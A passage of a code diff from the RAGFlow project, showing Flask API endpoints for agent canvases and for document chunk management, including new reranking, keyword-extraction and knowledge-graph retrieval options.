||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@validate_request("dsl", "title")
|
||||
@login_required
|
||||
def save():
|
||||
req = request.json
|
||||
req["user_id"] = current_user.id
|
||||
if not isinstance(req["dsl"], str): req["dsl"] = json.dumps(req["dsl"], ensure_ascii=False)
|
||||
|
||||
req["dsl"] = json.loads(req["dsl"])
|
||||
if "id" not in req:
|
||||
if UserCanvasService.query(user_id=current_user.id, title=req["title"].strip()):
|
||||
return server_error_response(ValueError("Duplicated title."))
|
||||
req["id"] = get_uuid()
|
||||
if not UserCanvasService.save(**req):
|
||||
return get_data_error_result(retmsg="Fail to save canvas.")
|
||||
else:
|
||||
if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of canvas authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
UserCanvasService.update_by_id(req["id"], req)
|
||||
return get_json_result(data=req)
|
||||
|
||||
|
||||
@manager.route('/get/<canvas_id>', methods=['GET'])
|
||||
@login_required
|
||||
def get(canvas_id):
|
||||
e, c = UserCanvasService.get_by_id(canvas_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="canvas not found.")
|
||||
return get_json_result(data=c.to_dict())
|
||||
|
||||
|
||||
@manager.route('/completion', methods=['POST'])
|
||||
@validate_request("id")
|
||||
@login_required
|
||||
def run():
|
||||
req = request.json
|
||||
stream = req.get("stream", True)
|
||||
e, cvs = UserCanvasService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="canvas not found.")
|
||||
if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of canvas authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
if not isinstance(cvs.dsl, str):
|
||||
cvs.dsl = json.dumps(cvs.dsl, ensure_ascii=False)
|
||||
|
||||
final_ans = {"reference": [], "content": ""}
|
||||
message_id = req.get("message_id", get_uuid())
|
||||
try:
|
||||
canvas = Canvas(cvs.dsl, current_user.id)
|
||||
if "message" in req:
|
||||
canvas.messages.append({"role": "user", "content": req["message"], "id": message_id})
|
||||
canvas.add_user_input(req["message"])
|
||||
answer = canvas.run(stream=stream)
|
||||
print(canvas)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
assert answer is not None, "Nothing. Is it over?"
|
||||
|
||||
if stream:
|
||||
assert isinstance(answer, partial), "Nothing. Is it over?"
|
||||
|
||||
def sse():
|
||||
nonlocal answer, cvs
|
||||
try:
|
||||
for ans in answer():
|
||||
for k in ans.keys():
|
||||
final_ans[k] = ans[k]
|
||||
ans = {"answer": ans["content"], "reference": ans.get("reference", [])}
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": ans}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
canvas.messages.append({"role": "assistant", "content": final_ans["content"], "id": message_id})
|
||||
if final_ans.get("reference"):
|
||||
canvas.reference.append(final_ans["reference"])
|
||||
cvs.dsl = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
|
||||
except Exception as e:
|
||||
yield "data:" + json.dumps({"retcode": 500, "retmsg": str(e),
|
||||
"data": {"answer": "**ERROR**: " + str(e), "reference": []}},
|
||||
ensure_ascii=False) + "\n\n"
|
||||
yield "data:" + json.dumps({"retcode": 0, "retmsg": "", "data": True}, ensure_ascii=False) + "\n\n"
|
||||
|
||||
resp = Response(sse(), mimetype="text/event-stream")
|
||||
resp.headers.add_header("Cache-control", "no-cache")
|
||||
resp.headers.add_header("Connection", "keep-alive")
|
||||
resp.headers.add_header("X-Accel-Buffering", "no")
|
||||
resp.headers.add_header("Content-Type", "text/event-stream; charset=utf-8")
|
||||
return resp
|
||||
|
||||
final_ans["content"] = "\n".join(answer["content"]) if "content" in answer else ""
|
||||
canvas.messages.append({"role": "assistant", "content": final_ans["content"], "id": message_id})
|
||||
if final_ans.get("reference"):
|
||||
canvas.reference.append(final_ans["reference"])
|
||||
cvs.dsl = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], cvs.to_dict())
|
||||
return get_json_result(data={"answer": final_ans["content"], "reference": final_ans.get("reference", [])})
|
||||
|
||||
|
||||
@manager.route('/reset', methods=['POST'])
|
||||
@validate_request("id")
|
||||
@login_required
|
||||
def reset():
|
||||
req = request.json
|
||||
try:
|
||||
e, user_canvas = UserCanvasService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="canvas not found.")
|
||||
if not UserCanvasService.query(user_id=current_user.id, id=req["id"]):
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of canvas authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
canvas = Canvas(json.dumps(user_canvas.dsl), current_user.id)
|
||||
canvas.reset()
|
||||
req["dsl"] = json.loads(str(canvas))
|
||||
UserCanvasService.update_by_id(req["id"], {"dsl": req["dsl"]})
|
||||
return get_json_result(data=req["dsl"])
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/test_db_connect', methods=['POST'])
|
||||
@validate_request("db_type", "database", "username", "host", "port", "password")
|
||||
@login_required
|
||||
def test_db_connect():
|
||||
req = request.json
|
||||
try:
|
||||
if req["db_type"] in ["mysql", "mariadb"]:
|
||||
db = MySQLDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
|
||||
password=req["password"])
|
||||
elif req["db_type"] == 'postgresql':
|
||||
db = PostgresqlDatabase(req["database"], user=req["username"], host=req["host"], port=req["port"],
|
||||
password=req["password"])
|
||||
db.connect()
|
||||
db.close()
|
||||
return get_json_result(data="Database Connection Successful!")
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
@ -1,268 +1,331 @@
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import datetime
|
||||
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from elasticsearch_dsl import Q
|
||||
|
||||
from rag.app.qa import rmPrefix, beAdoc
|
||||
from rag.nlp import search, rag_tokenizer
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils import rmSpace
|
||||
from api.db import LLMType, ParserType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import TenantLLMService
|
||||
from api.db.services.user_service import UserTenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import RetCode, retrievaler
|
||||
from api.utils.api_utils import get_json_result
|
||||
import hashlib
|
||||
import re
|
||||
|
||||
|
||||
@manager.route('/list', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id")
|
||||
def list_chunk():
|
||||
req = request.json
|
||||
doc_id = req["doc_id"]
|
||||
page = int(req.get("page", 1))
|
||||
size = int(req.get("size", 30))
|
||||
question = req.get("keywords", "")
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
query = {
|
||||
"doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
|
||||
}
|
||||
if "available_int" in req:
|
||||
query["available_int"] = int(req["available_int"])
|
||||
sres = retrievaler.search(query, search.index_name(tenant_id))
|
||||
res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
|
||||
for id in sres.ids:
|
||||
d = {
|
||||
"chunk_id": id,
|
||||
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[id].get(
|
||||
"content_with_weight", ""),
|
||||
"doc_id": sres.field[id]["doc_id"],
|
||||
"docnm_kwd": sres.field[id]["docnm_kwd"],
|
||||
"important_kwd": sres.field[id].get("important_kwd", []),
|
||||
"img_id": sres.field[id].get("img_id", ""),
|
||||
"available_int": sres.field[id].get("available_int", 1),
|
||||
"positions": sres.field[id].get("position_int", "").split("\t")
|
||||
}
|
||||
if len(d["positions"]) % 5 == 0:
|
||||
poss = []
|
||||
for i in range(0, len(d["positions"]), 5):
|
||||
poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
|
||||
float(d["positions"][i + 3]), float(d["positions"][i + 4])])
|
||||
d["positions"] = poss
|
||||
res["chunks"].append(d)
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
if str(e).find("not_found") > 0:
|
||||
return get_json_result(data=False, retmsg=f'No chunk found!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@login_required
|
||||
def get():
|
||||
chunk_id = request.args["chunk_id"]
|
||||
try:
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
if not tenants:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
res = ELASTICSEARCH.get(
|
||||
chunk_id, search.index_name(
|
||||
tenants[0].tenant_id))
|
||||
if not res.get("found"):
|
||||
return server_error_response("Chunk not found")
|
||||
id = res["_id"]
|
||||
res = res["_source"]
|
||||
res["chunk_id"] = id
|
||||
k = []
|
||||
for n in res.keys():
|
||||
if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
|
||||
k.append(n)
|
||||
for n in k:
|
||||
del res[n]
|
||||
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
if str(e).find("NotFoundError") >= 0:
|
||||
return get_json_result(data=False, retmsg=f'Chunk not found!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "chunk_id", "content_with_weight",
|
||||
"important_kwd")
|
||||
def set():
|
||||
req = request.json
|
||||
d = {
|
||||
"id": req["chunk_id"],
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req["important_kwd"]
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
|
||||
if "available_int" in req:
|
||||
d["available_int"] = req["available_int"]
|
||||
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value)
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
if doc.parser_id == ParserType.QA:
|
||||
arr = [
|
||||
t for t in re.split(
|
||||
r"[\n\t]",
|
||||
req["content_with_weight"]) if len(t) > 1]
|
||||
if len(arr) != 2:
|
||||
return get_data_error_result(
|
||||
retmsg="Q&A must be separated by TAB/ENTER key.")
|
||||
q, a = rmPrefix(arr[0]), rmPrefix[arr[1]]
|
||||
d = beAdoc(d, arr[0], arr[1], not any(
|
||||
[rag_tokenizer.is_chinese(t) for t in q + a]))
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
|
||||
d["q_%d_vec" % len(v)] = v.tolist()
|
||||
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/switch', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("chunk_ids", "available_int", "doc_id")
|
||||
def switch():
|
||||
req = request.json
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
if not ELASTICSEARCH.upsert([{"id": i, "available_int": int(req["available_int"])} for i in req["chunk_ids"]],
|
||||
search.index_name(tenant_id)):
|
||||
return get_data_error_result(retmsg="Index updating failure")
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("chunk_ids")
|
||||
def rm():
|
||||
req = request.json
|
||||
try:
|
||||
if not ELASTICSEARCH.deleteByQuery(
|
||||
Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
|
||||
return get_data_error_result(retmsg="Index updating failure")
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "content_with_weight")
|
||||
def create():
|
||||
req = request.json
|
||||
md5 = hashlib.md5()
|
||||
md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
|
||||
chunck_id = md5.hexdigest()
|
||||
d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req.get("important_kwd", [])
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
|
||||
d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
|
||||
d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
|
||||
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
d["kb_id"] = [doc.kb_id]
|
||||
d["docnm_kwd"] = doc.name
|
||||
d["doc_id"] = doc.id
|
||||
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value)
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
DocumentService.increment_chunk_num(req["doc_id"], doc.kb_id, c, 1, 0)
|
||||
v = 0.1 * v[0] + 0.9 * v[1]
|
||||
d["q_%d_vec" % len(v)] = v.tolist()
|
||||
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
|
||||
return get_json_result(data={"chunk_id": chunck_id})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/retrieval_test', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "question")
|
||||
def retrieval_test():
|
||||
req = request.json
|
||||
page = int(req.get("page", 1))
|
||||
size = int(req.get("size", 30))
|
||||
question = req["question"]
|
||||
kb_id = req["kb_id"]
|
||||
doc_ids = req.get("doc_ids", [])
|
||||
similarity_threshold = float(req.get("similarity_threshold", 0.2))
|
||||
vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
|
||||
top = int(req.get("top_k", 1024))
|
||||
try:
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Knowledgebase not found!")
|
||||
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
|
||||
ranks = retrievaler.retrieval(question, embd_mdl, kb.tenant_id, [kb_id], page, size, similarity_threshold,
|
||||
vector_similarity_weight, top, doc_ids)
|
||||
for c in ranks["chunks"]:
|
||||
if "vector" in c:
|
||||
del c["vector"]
|
||||
|
||||
return get_json_result(data=ranks)
|
||||
except Exception as e:
|
||||
if str(e).find("not_found") > 0:
|
||||
return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
#
|
||||
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
|
||||
#
|
||||
# Licensed under the Apache License, Version 2.0 (the "License");
|
||||
# you may not use this file except in compliance with the License.
|
||||
# You may obtain a copy of the License at
|
||||
#
|
||||
# http://www.apache.org/licenses/LICENSE-2.0
|
||||
#
|
||||
# Unless required by applicable law or agreed to in writing, software
|
||||
# distributed under the License is distributed on an "AS IS" BASIS,
|
||||
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||
# See the License for the specific language governing permissions and
|
||||
# limitations under the License.
|
||||
#
|
||||
import datetime
|
||||
import json
|
||||
import traceback
|
||||
|
||||
from flask import request
|
||||
from flask_login import login_required, current_user
|
||||
from elasticsearch_dsl import Q
|
||||
|
||||
from rag.app.qa import rmPrefix, beAdoc
|
||||
from rag.nlp import search, rag_tokenizer, keyword_extraction
|
||||
from rag.utils.es_conn import ELASTICSEARCH
|
||||
from rag.utils import rmSpace
|
||||
from api.db import LLMType, ParserType
|
||||
from api.db.services.knowledgebase_service import KnowledgebaseService
|
||||
from api.db.services.llm_service import TenantLLMService
|
||||
from api.db.services.user_service import UserTenantService
|
||||
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
|
||||
from api.db.services.document_service import DocumentService
|
||||
from api.settings import RetCode, retrievaler, kg_retrievaler
|
||||
from api.utils.api_utils import get_json_result
|
||||
import hashlib
|
||||
import re
|
||||
|
||||
|
||||
@manager.route('/list', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id")
|
||||
def list_chunk():
|
||||
req = request.json
|
||||
doc_id = req["doc_id"]
|
||||
page = int(req.get("page", 1))
|
||||
size = int(req.get("size", 30))
|
||||
question = req.get("keywords", "")
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
e, doc = DocumentService.get_by_id(doc_id)
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
query = {
|
||||
"doc_ids": [doc_id], "page": page, "size": size, "question": question, "sort": True
|
||||
}
|
||||
if "available_int" in req:
|
||||
query["available_int"] = int(req["available_int"])
|
||||
sres = retrievaler.search(query, search.index_name(tenant_id), highlight=True)
|
||||
res = {"total": sres.total, "chunks": [], "doc": doc.to_dict()}
|
||||
for id in sres.ids:
|
||||
d = {
|
||||
"chunk_id": id,
|
||||
"content_with_weight": rmSpace(sres.highlight[id]) if question and id in sres.highlight else sres.field[
|
||||
id].get(
|
||||
"content_with_weight", ""),
|
||||
"doc_id": sres.field[id]["doc_id"],
|
||||
"docnm_kwd": sres.field[id]["docnm_kwd"],
|
||||
"important_kwd": sres.field[id].get("important_kwd", []),
|
||||
"img_id": sres.field[id].get("img_id", ""),
|
||||
"available_int": sres.field[id].get("available_int", 1),
|
||||
"positions": sres.field[id].get("position_int", "").split("\t")
|
||||
}
|
||||
if len(d["positions"]) % 5 == 0:
|
||||
poss = []
|
||||
for i in range(0, len(d["positions"]), 5):
|
||||
poss.append([float(d["positions"][i]), float(d["positions"][i + 1]), float(d["positions"][i + 2]),
|
||||
float(d["positions"][i + 3]), float(d["positions"][i + 4])])
|
||||
d["positions"] = poss
|
||||
res["chunks"].append(d)
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
if str(e).find("not_found") > 0:
|
||||
return get_json_result(data=False, retmsg=f'No chunk found!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@login_required
|
||||
def get():
|
||||
chunk_id = request.args["chunk_id"]
|
||||
try:
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
if not tenants:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
res = ELASTICSEARCH.get(
|
||||
chunk_id, search.index_name(
|
||||
tenants[0].tenant_id))
|
||||
if not res.get("found"):
|
||||
return server_error_response("Chunk not found")
|
||||
id = res["_id"]
|
||||
res = res["_source"]
|
||||
res["chunk_id"] = id
|
||||
k = []
|
||||
for n in res.keys():
|
||||
if re.search(r"(_vec$|_sm_|_tks|_ltks)", n):
|
||||
k.append(n)
|
||||
for n in k:
|
||||
del res[n]
|
||||
|
||||
return get_json_result(data=res)
|
||||
except Exception as e:
|
||||
if str(e).find("NotFoundError") >= 0:
|
||||
return get_json_result(data=False, retmsg=f'Chunk not found!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/set', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "chunk_id", "content_with_weight",
|
||||
"important_kwd")
|
||||
def set():
|
||||
req = request.json
|
||||
d = {
|
||||
"id": req["chunk_id"],
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_ltks"] = rag_tokenizer.tokenize(req["content_with_weight"])
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req["important_kwd"]
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req["important_kwd"]))
|
||||
if "available_int" in req:
|
||||
d["available_int"] = req["available_int"]
|
||||
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
|
||||
if doc.parser_id == ParserType.QA:
|
||||
arr = [
|
||||
t for t in re.split(
|
||||
r"[\n\t]",
|
||||
req["content_with_weight"]) if len(t) > 1]
|
||||
if len(arr) != 2:
|
||||
return get_data_error_result(
|
||||
retmsg="Q&A must be separated by TAB/ENTER key.")
|
||||
q, a = rmPrefix(arr[0]), rmPrefix(arr[1])
|
||||
d = beAdoc(d, arr[0], arr[1], not any(
|
||||
[rag_tokenizer.is_chinese(t) for t in q + a]))
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
v = 0.1 * v[0] + 0.9 * v[1] if doc.parser_id != ParserType.QA else v[1]
|
||||
d["q_%d_vec" % len(v)] = v.tolist()
|
||||
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/switch', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("chunk_ids", "available_int", "doc_id")
|
||||
def switch():
|
||||
req = request.json
|
||||
try:
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
if not ELASTICSEARCH.upsert([{"id": i, "available_int": int(req["available_int"])} for i in req["chunk_ids"]],
|
||||
search.index_name(tenant_id)):
|
||||
return get_data_error_result(retmsg="Index updating failure")
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/rm', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("chunk_ids", "doc_id")
|
||||
def rm():
|
||||
req = request.json
|
||||
try:
|
||||
if not ELASTICSEARCH.deleteByQuery(
|
||||
Q("ids", values=req["chunk_ids"]), search.index_name(current_user.id)):
|
||||
return get_data_error_result(retmsg="Index updating failure")
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
deleted_chunk_ids = req["chunk_ids"]
|
||||
chunk_number = len(deleted_chunk_ids)
|
||||
DocumentService.decrement_chunk_num(doc.id, doc.kb_id, 1, chunk_number, 0)
|
||||
return get_json_result(data=True)
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/create', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("doc_id", "content_with_weight")
|
||||
def create():
|
||||
req = request.json
|
||||
md5 = hashlib.md5()
|
||||
md5.update((req["content_with_weight"] + req["doc_id"]).encode("utf-8"))
|
||||
chunck_id = md5.hexdigest()
|
||||
d = {"id": chunck_id, "content_ltks": rag_tokenizer.tokenize(req["content_with_weight"]),
|
||||
"content_with_weight": req["content_with_weight"]}
|
||||
d["content_sm_ltks"] = rag_tokenizer.fine_grained_tokenize(d["content_ltks"])
|
||||
d["important_kwd"] = req.get("important_kwd", [])
|
||||
d["important_tks"] = rag_tokenizer.tokenize(" ".join(req.get("important_kwd", [])))
|
||||
d["create_time"] = str(datetime.datetime.now()).replace("T", " ")[:19]
|
||||
d["create_timestamp_flt"] = datetime.datetime.now().timestamp()
|
||||
|
||||
try:
|
||||
e, doc = DocumentService.get_by_id(req["doc_id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Document not found!")
|
||||
d["kb_id"] = [doc.kb_id]
|
||||
d["docnm_kwd"] = doc.name
|
||||
d["doc_id"] = doc.id
|
||||
|
||||
tenant_id = DocumentService.get_tenant_id(req["doc_id"])
|
||||
if not tenant_id:
|
||||
return get_data_error_result(retmsg="Tenant not found!")
|
||||
|
||||
embd_id = DocumentService.get_embd_id(req["doc_id"])
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
tenant_id, LLMType.EMBEDDING.value, embd_id)
|
||||
|
||||
v, c = embd_mdl.encode([doc.name, req["content_with_weight"]])
|
||||
v = 0.1 * v[0] + 0.9 * v[1]
|
||||
d["q_%d_vec" % len(v)] = v.tolist()
|
||||
ELASTICSEARCH.upsert([d], search.index_name(tenant_id))
|
||||
|
||||
DocumentService.increment_chunk_num(
|
||||
doc.id, doc.kb_id, c, 1, 0)
|
||||
return get_json_result(data={"chunk_id": chunck_id})
|
||||
except Exception as e:
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/retrieval_test', methods=['POST'])
|
||||
@login_required
|
||||
@validate_request("kb_id", "question")
|
||||
def retrieval_test():
|
||||
req = request.json
|
||||
page = int(req.get("page", 1))
|
||||
size = int(req.get("size", 30))
|
||||
question = req["question"]
|
||||
kb_id = req["kb_id"]
|
||||
if isinstance(kb_id, str): kb_id = [kb_id]
|
||||
doc_ids = req.get("doc_ids", [])
|
||||
similarity_threshold = float(req.get("similarity_threshold", 0.0))
|
||||
vector_similarity_weight = float(req.get("vector_similarity_weight", 0.3))
|
||||
top = int(req.get("top_k", 1024))
|
||||
|
||||
try:
|
||||
tenants = UserTenantService.query(user_id=current_user.id)
|
||||
for kid in kb_id:
|
||||
for tenant in tenants:
|
||||
if KnowledgebaseService.query(
|
||||
tenant_id=tenant.tenant_id, id=kid):
|
||||
break
|
||||
else:
|
||||
return get_json_result(
|
||||
data=False, retmsg=f'Only owner of knowledgebase authorized for this operation.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
e, kb = KnowledgebaseService.get_by_id(kb_id[0])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Knowledgebase not found!")
|
||||
|
||||
embd_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.EMBEDDING.value, llm_name=kb.embd_id)
|
||||
|
||||
rerank_mdl = None
|
||||
if req.get("rerank_id"):
|
||||
rerank_mdl = TenantLLMService.model_instance(
|
||||
kb.tenant_id, LLMType.RERANK.value, llm_name=req["rerank_id"])
|
||||
|
||||
if req.get("keyword", False):
|
||||
chat_mdl = TenantLLMService.model_instance(kb.tenant_id, LLMType.CHAT)
|
||||
question += keyword_extraction(chat_mdl, question)
|
||||
|
||||
retr = retrievaler if kb.parser_id != ParserType.KG else kg_retrievaler
|
||||
ranks = retr.retrieval(question, embd_mdl, kb.tenant_id, kb_id, page, size,
|
||||
similarity_threshold, vector_similarity_weight, top,
|
||||
doc_ids, rerank_mdl=rerank_mdl, highlight=req.get("highlight"))
|
||||
for c in ranks["chunks"]:
|
||||
if "vector" in c:
|
||||
del c["vector"]
|
||||
|
||||
return get_json_result(data=ranks)
|
||||
except Exception as e:
|
||||
if str(e).find("not_found") > 0:
|
||||
return get_json_result(data=False, retmsg=f'No chunk found! Check the chunk status please!',
|
||||
retcode=RetCode.DATA_ERROR)
|
||||
return server_error_response(e)
|
||||
|
||||
|
||||
@manager.route('/knowledge_graph', methods=['GET'])
|
||||
@login_required
|
||||
def knowledge_graph():
|
||||
doc_id = request.args["doc_id"]
|
||||
req = {
|
||||
"doc_ids":[doc_id],
|
||||
"knowledge_graph_kwd": ["graph", "mind_map"]
|
||||
}
|
||||
tenant_id = DocumentService.get_tenant_id(doc_id)
|
||||
sres = retrievaler.search(req, search.index_name(tenant_id))
|
||||
